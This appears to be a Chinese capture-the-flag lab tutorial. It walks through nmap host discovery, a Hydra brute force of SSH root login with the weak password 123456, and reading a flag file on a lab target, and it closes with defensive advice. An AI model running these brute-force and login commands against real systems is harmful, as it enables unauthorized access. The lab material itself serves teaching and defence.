CTF攻防综合实战(1)

综合实战(1)实验教学

一、实验目的

掌握局域网主机发现、端口存活探测的基础方法,理解弱口令爆破的风险原理,学会通过SSH登录目标主机获取权限、读取Flag文件,建立「攻击链从信息收集到权限获取」的完整认知。


二、实验前置说明

实验环境预设:攻击机为Kali Linux,目标机为同网段的Linux靶机,网段为192.168.100.0/24


三、详细操作步骤
步骤1:确认攻击机网络配置+发现存活主机

首先在Kali终端执行ifconfig,查看攻击机自身IP:

复制代码
ifconfig
# 输出中eth0的inet字段即为本机IP,示例中为192.168.100.200

接着用Nmap做主机发现,扫描整个C段存活设备:

复制代码
nmap -sn -PR 192.168.100.0/24
# 参数说明:-sn 只做ping扫描不扫端口;-PR 用ARP协议探测(内网更高效)

扫描结果会显示该网段存活2台主机:192.168.100.200(本机)、192.168.100.100(目标靶机)。


步骤2:SSH弱口令爆破获取登录权限

已知目标开放22端口(SSH服务),使用Hydra工具针对root用户做弱口令爆破:

复制代码
hydra -l root -p 123456 ssh://192.168.100.100
# 实际场景中常用字典替代单密码,-l指定用户名、-P指定密码字典

示例中直接命中弱口令123456,输出提示1 valid password found,爆破成功。


步骤3:登录靶机获取Flag

用SSH登录目标机:

复制代码
ssh root@192.168.100.100
# 首次连接输入yes确认指纹,再输入爆破得到的密码123456

登录后验证权限为root,查看当前目录文件:

复制代码
whoami  # 确认当前用户为root
ls      # 看到目录下有root.txt文件
cat root.txt  # 读取Flag,示例中为THL{asdmaskdmasdkCASTOR}

四、实验原理与防御建议
  1. 风险原理:弱口令是内网最普遍的安全隐患,攻击者无需复杂漏洞即可直接获取服务器最高权限。

  2. 防御措施

    • 禁止root用户直接SSH登录,创建普通用户+sudo授权;

    • 设置长度≥12位、包含大小写+数字+特殊字符的强密码;

    • 修改SSH默认22端口,部署fail2ban工具封禁多次爆破的IP。

相关推荐
问简12 小时前
【共享盘】ubuntu、windows
linux·windows·ubuntu
公子小六14 小时前
基于.NET的Windows窗体编程之WinForms图像控件
windows·microsoft·c#·.net·winforms
狂热开发者14 小时前
用 Typeoff 把会后口述整理成 Markdown 决策记录
人工智能·windows·macos·ios·安卓
何中应14 小时前
Windows7 虚拟机如何传文件
windows·vmware·虚拟机
ofoxcoding15 小时前
Codex Computer Use 完整指南:AI 自动操控 Mac 与 Windows 桌面实战详解
人工智能·windows·macos·ai
Nontee15 小时前
Set 这个东西,跟我一开始想的不太一样
java·linux·windows·microsoft
XUHUOJUN16 小时前
Windows Server 2025 Stretch Cluster 架构详解
windows·microsoft·azure local
zhou1352848226717 小时前
Windows 配置 WSL (Ubuntu) 环境完整指南
linux·windows·ubuntu
han_hanker17 小时前
sql语法 MyBatis <foreach> 标签详解
windows·sql·mybatis
XUHUOJUN17 小时前
Windows Server 2025 RAC vs Stretch Cluster 技术定位
windows·microsoft·azure local